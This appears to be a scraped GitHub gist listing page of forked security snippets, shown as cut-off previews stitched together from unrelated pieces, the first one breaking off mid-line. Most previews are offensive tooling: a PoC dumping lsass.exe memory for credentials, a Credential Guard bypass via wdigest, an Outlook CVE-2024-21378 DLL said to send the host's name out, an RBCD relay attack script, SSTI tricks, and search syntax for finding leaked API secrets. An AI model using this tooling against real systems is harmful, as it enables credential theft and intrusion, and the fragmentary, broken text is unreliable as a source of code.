
import sys
# The a and b values for each index in the block.
keys = {0: (54, 147), 1: (96, 129), 2: (59, 193), 4: (45, 130), 5: (96, 144), 6: (27, 129), 8: (44, 180), 9: (118, 141), 10: (115, 129), 12: (13, 164), 13: (27, 133), 14: (20, 192), 16: (28, 166), 17: (17, 133), 18: (19, 193), 20: (20, 161), 22: (14, 193), 23: (12, 132), 24: (18, 161), 25: (17, 140), 26: (29, 192), 28: (115, 178), 29: (28, 132), 31: (12, 132), 32: (31, 165), 33: (20, 136), 34: (27, 193), 36: (96, 164), 37: (18, 133), 39: (23, 132), 40: (13, 165), 41: (13, 148), 42: (23, 193), 43: (19, 132), 44: (27, 178), 45: (83, 137), 48: (18, 166), 49: (96, 148), 50: (13, 193), 52: (96, 166), 53: (20, 129), 54: (20, 193), 55: (27, 132), 56: (9, 160), 57: (96, 148), 58: (13, 192), 60: (96, 180), 62: (31, 193), 64: (7, 166), 66: (20, 192), 67: (27, 132), 68: (28, 160), 69: (17, 149), 70: (19, 193), 71: (96, 132), 72: (76, 164), 74: (80, 192), 75: (78, 132), 76: (96, 160), 77: (27, 144), 78: (24, 193), 80: (96, 178), 81: (17, 141), 82: (12, 193), 8
@yeshuibo
yeshuibo / FreeMarker_SSTI_tricks.md
Created December 19, 2024 01:27 — forked from n1nj4sec/FreeMarker_SSTI_tricks.md
FreeMarker SSTI tricks

What is this cheat sheet?

I recently stumbled on a blind SSTI injection on a bug bounty program (no output nor stack trace, only a 500 status code on invalid syntax).

The version was up to date and it was not possible to RCE because the conf was following best practices and there is no public sandbox bypass on the latest version. So was it possible to do stuff anyway? Yes, I found some nice gadgets to enumerate all accessible variables from the engine, read data blindly or perform some DoS.

This is not meant to be complete; you will find classic payloads for FreeMarker on other cheat sheets. This is only the new stuff from my research, which is not public anywhere else.

get versions

@yeshuibo
yeshuibo / Get-InjectedThread.ps1
Created December 18, 2024 07:44 — forked from jaredcatkinson/Get-InjectedThread.ps1
Code from "Taking Hunting to the Next Level: Hunting in Memory" presentation at SANS Threat Hunting Summit 2017 by Jared Atkinson and Joe Desimone
function Get-InjectedThread
{
<#
.SYNOPSIS
Looks for threads that were created as a result of code injection.
.DESCRIPTION
@yeshuibo
yeshuibo / A.java
Created December 18, 2024 01:09 — forked from win3zz/A.java
Unicode escapes in Java are preprocessed before lexical analysis; they can break comments and inject code!
/**
* Description:
* You can decode the hidden message by running the program.
* Compile and execute: user@host:~$ javac A.java && java A
*
* @author Bipin Jitiya
* @since 2024-12-17
*/
class A {
public static void main(String[] args){

GitHub Search Syntax for Finding API Keys/Secrets/Tokens

As a security professional, it is important to conduct a thorough reconnaissance. With the increasing use of APIs nowadays, it has become paramount to keep access tokens and other API-related secrets secure in order to prevent leaks. However, despite technological advances, human error remains a factor, and many developers still unknowingly hardcode their API secrets into source code and commit them to public repositories. GitHub, being a widely popular platform for public code repositories, may inadvertently host such leaked secrets. To help identify these vulnerabilities, I have created a comprehensive search list using powerful search syntax that enables the search of thousands of leaked keys and secrets in a single search.

Search Syntax:

(path:*.{File_extension1} OR path:*.{File_extension-N}) AND ({Keyname1} OR {Keyname-N}) AND (({Signature/pattern1} OR {Signature/pattern-N}) AND ({PlatformTag1} OR {PlatformTag-N}))

Examples:

**1.

@yeshuibo
yeshuibo / refl.cpp
Created October 18, 2024 01:03 — forked from GeneralTesler/refl.cpp
PoC using RtlCreateProcessReflection + MiniDumpWriteDump to dump lsass.exe process memory
#include <Windows.h>
#include <iostream>
#include <DbgHelp.h>
#include <processsnapshot.h>
#include <TlHelp32.h>
#include <processthreadsapi.h>
//process reflection stuff copied from: https://github.com/hasherezade/pe-sieve/blob/master/utils/process_reflection.cpp
//minidump/process searching copied from: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass
//compile using: cl.exe refl.cpp /DUNICODE
@yeshuibo
yeshuibo / CredGuard_PoC
Created July 15, 2024 01:30 — forked from N4kedTurtle/CredGuard_PoC
PoC for enabling wdigest to bypass credential guard
#define _CRT_SECURE_NO_WARNINGS
#include <Windows.h>
#include <Psapi.h>
#include <TlHelp32.h>
#include <iostream>
DWORD GetLsassPid() {
PROCESSENTRY32 entry;
entry.dwSize = sizeof(PROCESSENTRY32);
@yeshuibo
yeshuibo / VR_roadmap.md
Created June 21, 2024 01:01 — forked from tin-z/VR_roadmap.md
Becoming a Vulnerability Researcher roadmap: my personal experience
@yeshuibo
yeshuibo / test_dll.c
Created April 13, 2024 01:46 — forked from Homer28/test_dll.c
DLL code for testing CVE-2024-21378 in MS Outlook
/**
* This DLL is designed for use in conjunction with the Ruler tool for
* security testing related to the CVE-2024-21378 vulnerability,
* specifically targeting MS Outlook.
*
* It can be used with the following command line syntax:
* ruler [auth-params] form add-com [attack-params] --dll ./test.dll
* Ruler repository: https://github.com/NetSPI/ruler/tree/com-forms (com-forms branch).
*
* After being loaded into MS Outlook, it sends the PC's hostname and
@yeshuibo
yeshuibo / rbcd_relay.py
Created March 15, 2024 05:31 — forked from 3xocyte/rbcd_relay.py
PoC resource-based constrained delegation relay attack tool
#!/usr/bin/env python
# for more info: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
# this is a *very* rough PoC
import SimpleHTTPServer
import SocketServer
import base64
import random
import struct